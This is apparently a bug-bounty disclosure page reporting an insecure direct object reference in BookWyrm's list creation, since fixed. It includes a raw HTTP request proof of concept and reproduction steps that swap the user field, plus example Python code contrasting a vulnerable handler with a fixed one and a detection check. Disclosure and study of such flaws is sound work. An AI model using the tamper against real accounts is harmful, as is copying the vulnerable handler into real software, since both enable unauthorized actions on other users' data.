Insecure Direct Object References when creating a list in bookwyrm-social/bookwyrm

Valid

Reported on

Jul 18th 2022


Description

Insecure direct object references when creating a list allows one user to create a new list on behalf of another.

Proof of Concept

POST /list HTTP/2
Host: bookwyrm.social
Cookie: django_language=None; csrftoken=I5lj4znBJ9B5HnT3FAsII67G1EISidIKGlsIz5ElN9kmlDwucM2hGKx0Fy4gM8vj; sessionid=kskbj9mmxksyiaqyup8tsri8zrh6x0xi
Content-Length: 158
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://bookwyrm.social
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://bookwyrm.social/user/<user1>/lists
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

csrfmiddlewaretoken=z1U84ZsGwubuTiOAGXssNXkAfZ7KbII6xh1xzvJqAuULxyr1d921LBKUTTt8FDvF&user=<user2_id>&name=testname&description=testdes&curation=closed&privacy=public

Steps to reproduce

1. Log in with the user1 account, then go to the Profile page.
2. Go to the Lists tab, then create a new list.
3. Intercept the request and, in the body, change the value of `user` from user1_id to user2_id, then forward the request.
4. You will see that the new list is created in the user2 account instead of the user1 account.

Impact

This vulnerability allows a user to create a list on other users' accounts, affecting the logic of the application.
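The root cause described above, modelled as an added, framework-free example (this is not bookwyrm's own Django view): the vulnerable handler takes the list owner from the client-controlled `user` form field, the fixed handler binds the owner to the authenticated session user and discards the field, and a small detection helper flags requests whose `user` field disagrees with the session. The form body, field allow-list and user ids are constructed for illustration.

```python
from urllib.parse import parse_qs

# Constructed form body in the shape of the report's PoC: the `user` field is
# attacker-controlled, everything else is ordinary list data.
POC_BODY = ("csrfmiddlewaretoken=TOKEN&user=42&name=testname"
            "&description=testdes&curation=closed&privacy=public")

# Assumed allow-list of fields the client may legitimately set on a list.
ALLOWED_FIELDS = {"name", "description", "curation", "privacy"}


def parse_form(body: str) -> dict:
    """Flatten an application/x-www-form-urlencoded body to single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def create_list_vulnerable(session_user_id: int, body: str) -> dict:
    """Vulnerable pattern: the owner comes from the form's `user` field, so
    any authenticated user can create a list under another account."""
    form = parse_form(body)
    return {"owner": int(form["user"]), "name": form["name"],
            "privacy": form["privacy"]}


def create_list_fixed(session_user_id: int, body: str) -> dict:
    """Hardened pattern: the owner is always the session user; `user` and any
    other unexpected field are dropped before the record is built."""
    form = {k: v for k, v in parse_form(body).items() if k in ALLOWED_FIELDS}
    return {"owner": session_user_id, **form}


def owner_mismatch(session_user_id: int, body: str) -> bool:
    """Detection helper: True when the submitted `user` field does not match
    the authenticated user, which is the signature of this tampering."""
    form = parse_form(body)
    return "user" in form and form["user"] != str(session_user_id)


if __name__ == "__main__":
    print(create_list_vulnerable(7, POC_BODY))  # owner 42: lands in user2's account
    print(create_list_fixed(7, POC_BODY))       # owner 7: bound to the session
    print(owner_mismatch(7, POC_BODY))          # True
```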

We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
We have contacted a member of the bookwyrm-social/bookwyrm team and are waiting to hear back a year ago
We have sent a follow up to the bookwyrm-social/bookwyrm team. We will try again in 7 days. a year ago
Mouse Reeve validated this vulnerability a year ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mouse Reeve marked this as fixed in 0.4.5 with commit 41b20c a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
form.html#L1-L116 has been validated
list.py#L23-L176 has been validated
create_form.html#L1-L12 has been validated
KhanhCM
a year ago

Researcher


Hi @maintainer,

Can you please review my other reports? Here are the links for them:
https://huntr.dev/bounties/8e6881f7-40c0-4bfe-a2bd-2f10b6ed9a90/.
https://huntr.dev/bounties/817d1e61-8611-4c4d-9c14-834352f427cb/.

Many thanks!

